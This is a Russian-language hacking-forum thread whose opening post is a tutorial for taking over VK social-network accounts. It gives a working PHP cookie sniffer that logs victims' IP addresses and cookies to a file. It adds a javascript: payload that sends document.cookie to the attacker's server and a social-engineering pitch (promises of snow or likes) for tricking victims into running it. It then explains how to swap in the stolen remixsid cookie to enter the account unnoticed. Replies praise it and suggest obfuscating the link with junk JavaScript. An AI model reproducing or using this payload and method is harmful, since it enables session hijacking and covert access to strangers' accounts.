Круче чем просто фишинг

Круче чем просто фишинг

Тема в разделе "Социальные сети", создана пользователем MoRRoM, 13.11.2017.

Загрузка...
Ответов: 62 Просмотров: 2862 Ответить в теме
  1. MoRRoM
    Всем привет, обещал я некоторым форумчанам тему и вот собственно она. Думаю всё вам будет понятно, если нет, то спрашивайте не стесняйтесь.

    Сегодня я покажу вам способ взлома страницы ВК. Этот способ довольно старый пользуюсь им с 2014-15 года и до сих пор работает!

    Для нам понадобится ftp сервер. Создаём там папку, и назовем его next, выбираем эту папку и жмем кнопку chmod и у нас появятся галочки, ставим на все и сохраняем. Внутри папки создаём файл index.php

    Открываем и пишем снифер:

    <?php

    //получаем данные с ссылки

    $cookie = $_SERVER['REQUEST_URI'];

    //ip адрес

    $ip = $_SERVER['REMOTE_ADDR'];

    //Создаём файл

    $file = fopen("snif.dat","a+");

    //вычисляем текущее время

    $time = date("H:i:M:d");

    //добавляем в строковую переменную куки + время + ip

    $add_text = "$ip $time $cookie";

    //записываем данные в файл

    fputs($file,$add_text.",\r\n");

    //закрываем файл

    fclose($file);

    //что бы не вполили переносим пользователя обратно в вк

    header('Location:https://vk.com');

    ?>

    Снифер готов. У нас должно получиться такая ссылка

    http://ваш_домен.ру/next/index.php

    Далее открываем любой текстовый редактор(например блоткнот) и пишем:

    javascript:window.location.href = "http://ваш_домен.ру/next/index.php?cookie="+document.cookie;

    И скидывает это жертве, пишем ему например если поставишь это в адресную строку на твоей странице пойдет снег или на всех твоих фотках на странице будет по 10 000 лайком. Если жертва запустит этот скрипт в адресной строке, то её сразу переведёт в начальную страницу вк. А у нас на сервере будет дат файл с его куками.

    Следующая задача подмена уведенных куков. И это оказалось вообще проще простого. Открыв браузер Опера => Настройки => Общие настройки => Расширенные => Cookies Opera Cookies(для других браузеров есть специальное расширение EditThisCookie. Достаточно изменил только значение параметра куков remixsid, обновляю страницу и сразу же вошел в другой аккаунт, и не надо писать ни какой логин или пароль + то что жертва не узнает что вы вошли на его или её страницу. На этом всё.

    Не забывайте оценить :))
     
    13.11.2017 Сообщений: 1053 Симпатий: 856
  2. NEEXTOUCH
    Годнота)))
     
    13.11.2017 Сообщений: 386 Симпатий: 375
  3. panarama360
    panarama360
    Бляя, спасибо, как говорится "гениальное - просто", серьезно, это некий xss ток с соц инженерией
     
    13.11.2017 Сообщений: 212 Симпатий: 191
  4. MoRRoM
    Да не за что =)
     
    13.11.2017 Сообщений: 1053 Симпатий: 856
  5. MoRRoM
    Всё для вас и без хайда, берите на здоровье!
     
    13.11.2017 Сообщений: 1053 Симпатий: 856
  6. panarama360
    panarama360
    А еще можно в ссылку написать всякий мусор на js, и минимизировать js, будет огромная строка непонятно чего, так подозрений меньше будет
     
    13.11.2017 Сообщений: 212 Симпатий: 191
  7. Eb0cka
    Каеф, лови лойсик
     
    13.11.2017 Сообщений: 225 Симпатий: 175
  8. MoRRoM
    upload_2017-11-13_18-37-0.png

    Последние несколько тем у меня прям зашли думаю продолжить их писать, только вот NEEXTOUCH давал мне темы, а сейчас не знаю о чём вам писать. Просите что-нибудь буду искать идеи. (И да эта тема так же была написана с телефона, да это жоска...)
     
    13.11.2017 Сообщений: 1053 Симпатий: 856
  9. panarama360
    panarama360
    Но в chrome не работает(
     
    13.11.2017 Сообщений: 212 Симпатий: 191
  10. MoRRoM
    Что именно?
     
    13.11.2017 Сообщений: 1053 Симпатий: 856
Вам, как гостю, ограничены возможности взаимодействия с темами. Пройдите бесплатную регистрацию и откройте для себя море возможностей.